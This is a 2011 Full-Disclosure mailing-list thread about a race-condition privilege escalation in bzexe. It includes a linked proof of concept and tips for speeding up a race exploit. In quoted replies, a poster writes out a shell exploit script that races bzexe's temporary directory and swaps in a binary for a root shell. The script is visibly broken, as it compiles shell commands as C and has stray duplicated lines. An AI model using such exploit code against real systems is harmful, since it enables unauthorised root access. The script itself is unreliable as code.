Nice :) I have put a post about this whole thread on www.crazycoders.com , will add this and props for those involved now :) thx to you, bugs and for others who were involved, also realise that i have now found that bzexe = bzip2 src code, so looking on debian/ubuntu and centos, there is a bzexe or bzip2 on every box,... luckily this issue is patched for both bzip2 and bzexe but know that it is even still being tested now against bunzip2 , on decompressions, but has not been done, only know that the src is same as bzip2 executable binary (linux), again, thx to everyone involved, it got patched within a day wich is what was the aim... Ubuntu is alittle safer ;s cheers. xd
On 7 November 2011 03:54, vladz <[email protected]> wrote: > > Hi! > > It's raining here, so I finally wrote a PoC for the bzexe issue: > > http://vladz.devzero.fr/other/bzexe_PoC.c.html > > It always succeed on my Dual-core. > > Cheers, > vladz. > > > On Fri, Oct 28, 2011 at 11:43:56AM +1100, xD 0x41 wrote: >> I just did a quick write of it , i think this is right anyhow.. i aint >> the greatest of bash/exploit coders in bash but i did try, and, i >> kinda had it almost same, but for one line, the while.. i guess that >> does it, well. here is an example i guess, if we wee to use gcc and >> make a binary called 'bad' properly.. i assume this would be the >> way... 8 >> >> >> #!/bin/sh >> cd /tmp >> cat > /tmp/bad.c << EOF >> chmod 777 /bin/dash >> EOF >> gcc /tmp/bad.c -o /tmp/bad >> while (true) do ./bz.sh ; done >> #!/bin/bash >> if [ -a /tmp/bash/gztmp* ] >> then >> echo "[+] Exploting .." >> mv /tmp/bash /tmp/bash.dir >> cp /tmp/bad /tmp/dash >> echo "[!] Got dash rootshell in: /tmp/dash .." >> ./dash >> ls -l /tmp/dash >> while (true) do ./bz.sh ; done >> whoami >> id >> su >> fi >> >> I think this would be kinda close ? >> I dont expect this togo onto public domain ATALL, so please, Ill >> respect your privacy but, you also respect mine ok :) >> I like you, your a great guy, and, awesome for taking the challenge, >> where even the striongest, like taviso, and kcope even, left in your >> wake... and even i am abit shocked but, am going to try and, put it >> into practice,... the .c bzexe doesnt really do it for me :P but yes, >> i did change it alittle so it atleast echoes across a tmp bin/sh or, >> so i think it needs.. then again, it might not need anything, ut, i >> know these pocs wont get people a rootshell unless we show them, so, i >> guess aslong as these kinda emails stay pvt, its all good. >> i have alot fo bugs in the bash area, and i discuss alot with some >> members of the list even ojn my irc channel on efnet #haxnet , and, >> there is ALL the exploit coders from FD probably, phrack and more >> gropups,core,kcope,and rapid7,all them other smaller secteams seem to >> lurk also, from a 3 user channel about 1 year ago, simply speaking >> about PoCs made and theyre worth. >> I guess it is good to see and then to prioritise, as debian have done >> now, with the bzexe :) >> See, it would have probably rmained nothing done for god knows, if you >> had not taken the challenge up, and, i cant believe you did it with a >> shitty 500mhz! LOL, i am loooking at about 4 of those atm on my floor, >> i did a tradein offer, p3 for p4 for 50bux, and , i was after that >> exact celeron and pentium 500mhz p3 cores, theyre very good when >> played with and, my gears all rack. >> Anyhow, i would love to chat with you, you use irc >? >> if so, id love to catchup and have a chat anytime :) >> If your in Australia, well heck come over for a coffee buddy! >> have a greeat day, and, if you can fix this to make a rootshell, well, >> it shuld make it anyhow but, just incase, i guess this is my own >> collection, and, i have like 6 sh files, wich between them, get all >> 2011 and earlier, and it is really scary because, there is NO way to >> expoit them , if using .c ... Anyhow, thankyou, very much, and, i and >> the secworld owe you a big thanks :) >> I only wish they credited ppl like me, who try to inpire...lol, i >> guess i am like one of those dodgy football managers who sleeps with >> pros and swtuff... hehe... kept in the back... for ther sake of >> sanity. >> lol... hjave a good one mate! >> xd / crazycoders.com ( i will soon make an article and a compete patch >> solution etc, when it has a patch availabale, ofcourse then >> >> PS: i will post it in one big PoC details with solution and patch >> attached to the posting etc...i dont like to pulish things wich are >> not atleast being patched.... so, i guess, enjoy! >> >> >> >> >> >> On 28 October 2011 04:34, vladz <[email protected]> wrote: >> > >> > >> > On Thu, Oct 27, 2011 at 05:01:30PM +0200, Benjamin Renaut wrote: >> >> http://pastebin.com/FaaEsXRW >> > >> > Nice thing, but for sure, it can be optimized. >> > >> > For example, to save time, I would suggest you to use rename() instead >> > of using both unlink() and rmdir() functions. Same thing for your >> > write_shellcode() function, it contains too much calls. It would be >> > preferable to create your nasty shell script first, and then (when it's >> > time), rename() it as dirname. >> > >> > Cheers, >> > -- >> > http://vladz.devzero.fr >> > PGP key 8F7E2D3C from pgp.mit.edu >> > >> > _______________________________________________ >> > Full-Disclosure - We believe in it. >> > Charter: http://lists.grok.org.uk/full-disclosure-charter.html >> > Hosted and sponsored by Secunia - http://secunia.com/ >> > > _______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
